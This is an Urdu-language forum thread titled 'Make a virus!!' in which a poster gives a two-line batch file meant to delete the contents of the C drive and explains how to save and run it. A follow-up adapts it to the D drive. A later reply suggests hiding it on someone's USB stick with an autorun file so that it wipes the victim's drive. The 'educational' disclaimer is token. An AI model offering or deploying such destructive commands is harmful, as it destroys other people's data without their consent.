Page 1 of 1

وائرس بنائیں!!

Posted: Wed Mar 27, 2013 10:38 am
by میاں محمد اشفاق
کیا آپ جانتے ہیں کہ وائرس کیسے بنایا جاتا ہے نہیں تو لو جی آج میں‌آپکو ایک خطرناک وائرس بنانا سکھاتا ہوں مگر براہ مہربانی اسے صرف تعلیمی نقطہ نظر سے استعمال کریں کسی کو نقصان پہچانے کے لئے ہر گز استعمال نہ کریں!!

(1) نوٹ پیڈ اوپن کریں.

Code: Select all

@Echo off
Del C:\ *.* |y
یہ کوڈ کاپی کر کے نوٹ پیڈ میں پیسٹ کر دیں.
فائل کو کسی بھی نام سے سیو کریں مگر اسکی فائل ٹائپ bat. رکھیں.
وائرس کو چلانے کے لئے اس پر ڈبل کلک کریں.

وارننگ

اگر آپ اس کو چلائیں گے تو یہ آپکی C ڈرائیو کے مواد کو ڈیلیٹ کر دے گا اس سے ہونے والے نقصان کے ہم ذمہ دار نہیں

Re: وائرس بنائیں!!

Posted: Wed Mar 27, 2013 11:54 am
by میاں محمد اشفاق
ویسے اس سے ایک کام اور بھی لیا جاسکتا ہے آپ کو کوئی ڈرائیو فارمیٹ کرنی ہو تو آپ اس ڈرائیو کا نام ڈرائیو سی کی جگہ دے دیں جیسا کہ میں نے D دیا ہے باقی طریقہ کار وہی ہے جب آپ کلک کریں گے تو آپ کی D ڈرائیو فارمیٹ ہو جائے گی.
@Echo off
Del D:\ *.* |y

Re: وائرس بنائیں!!

Posted: Wed Mar 27, 2013 12:40 pm
by چاند بابو
ہاہاہاہا
یہ بھی اچھی بات ہے.

Re: وائرس بنائیں!!

Posted: Wed Apr 09, 2014 1:11 pm
by فورٹعباس
کیا یہاں پر سوفٹ وئر اور پروگرامنگ لیکھنے کی تربیت نہیں دی جاتی اگر دی جاتی ہے تو وہ کونسا دھاگہ ہے.میں پروگرامنگ اور سوفٹ وئر بنانا سیکھنا چاہتا ہوں کوئی راہنمائی مل سکتی یہاں سے

Re: وائرس بنائیں!!

Posted: Wed Apr 09, 2014 1:14 pm
by میاں محمد اشفاق
اسکے لئے آپ اس دھاگے میں تشریف لائیں
[link]http://urdunama.org/forum/viewforum.php?f=65[/link]

Re: وائرس بنائیں!!

Posted: Wed Apr 09, 2014 3:10 pm
by یاسر عمران مرزا
اس فائل کو آٹو رن فائل کے ساتھ کسی کی یو ایس بی میں کاپی کر دیں، آٹو رن فائل میں اس طرح کا کوڈ لکھ دیں کہ وہ اس فائل کو چلا دے، ایسا کرنے سے جو بندہ بھی اس یو ایس بی کو اپنے کمپیوٹر میں لگائے گا، لگانے کے ساتھ ہی اس کی سی ڈرائیو کا ڈیٹا ڈیلیٹ ہو جائے گا، لیکن یہ کافی خطرناک قسم کا مذاق ہے، اس سے اجتناب کرنا اچھا ہو گا.

Re: وائرس بنائیں!!

Posted: Wed Apr 09, 2014 3:55 pm
by محمد شعیب
اس کام کو سنجیدگی سے سمجھنا چاہئیے.
وائرس، ہیکنگ، کریکنگ ان سب کے بارے میں اپنی اپنی معلومات شئر کریں.
شئرنگ کا شکریہ

Re: وائرس بنائیں!!

Posted: Thu Apr 10, 2014 10:56 am
by فورٹعباس
ہاں سب کو وائرس ہیکنگ اور کریکنگ کا علم شئر کرنا چاہئے ہے. تا کہ لوگ کچھ جان سکے انکے بارےمیں